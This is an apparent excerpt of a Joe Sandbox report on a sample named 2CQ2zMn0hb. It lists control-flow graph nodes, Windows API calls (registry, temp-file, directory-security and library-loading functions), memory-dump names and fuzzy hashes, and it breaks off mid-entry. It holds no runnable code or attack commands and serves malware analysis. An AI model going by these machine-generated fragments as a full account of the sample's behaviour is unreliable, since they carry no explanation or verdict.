                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 840 405f0d-405f19 841 405f1a-405f4e GetTickCount GetTempFileNameW 840->841 842 405f50-405f52 841->842 843 405f5d-405f5f 841->843 842->841 844 405f54 842->844 845 405f57-405f5a 843->845 844->845
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                              • API String ID: 1716503409-44229769
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 846 402d44-402d6d call 406255 848 402d72-402d74 846->848 849 402d76-402d7c 848->849 850 402dec-402df0 848->850 851 402d98-402dad RegEnumKeyW 849->851 852 402d7e-402d80 851->852 853 402daf-402dc1 RegCloseKey call 4067c2 851->853 854 402dd0-402dde RegCloseKey 852->854 855 402d82-402d96 call 402d44 852->855 860 402de0-402de6 RegDeleteKeyW 853->860 861 402dc3-402dce 853->861 854->850 855->851 855->853 860->850 861->850
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 863 40591f-40596a CreateDirectoryW 864 405970-40597d GetLastError 863->864 865 40596c-40596e 863->865 866 405997-405999 864->866 867 40597f-405993 SetFileSecurityW 864->867 865->866 867->865 868 405995 GetLastError 867->868 868->866
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 3449924974-0
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                              • SetFilePointer.KERNELBASE(0017AFB4,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer$CountTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 1092082344-0
                                                                                                              • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                              • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 334405425-0
                                                                                                              • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                              • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(00573800), ref: 00401BE7
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
